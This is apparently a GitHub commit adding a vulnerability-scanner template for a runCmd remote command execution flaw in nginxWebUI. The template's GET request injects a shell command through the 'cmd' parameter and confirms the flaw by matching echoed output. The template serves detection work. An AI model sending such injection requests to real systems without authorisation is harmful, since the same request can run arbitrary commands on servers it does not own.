Skip to content

Commit

Permalink
nginxwebui-runcmd-rce
Browse files Browse the repository at this point in the history
  • Loading branch information
unknown committed Jun 28, 2023
1 parent 01b1576 commit 21e9283
Showing 1 changed file with 21 additions and 0 deletions.
21 changes: 21 additions & 0 deletions nginxwebui/nginxwebui-runcmd-rce.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
id: nginxwebui-runcmd-rce

info:
name: Nginxwebui - RunCMD Remote Command Execution Vulnerability
author: unknown
severity: critical
description: |
Nginxwebui Causes Runcmd Remote Command Execution Vulnerability for Effective Authentication
reference:
- https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491574&idx=1&sn=043729e27577a851856c002cfb0409b8
tags: nginxwebui

http:
- method: GET
path:
- "{{BaseURL}}/AdminPage/conf/runCmd?cmd=expr%20199812440%20-%2010079%26%26echo%20nginx"
matchers:
- type: word
words:
- "<br>nginx<br>"
part: body

0 comments on commit 21e9283

Please sign in to comment.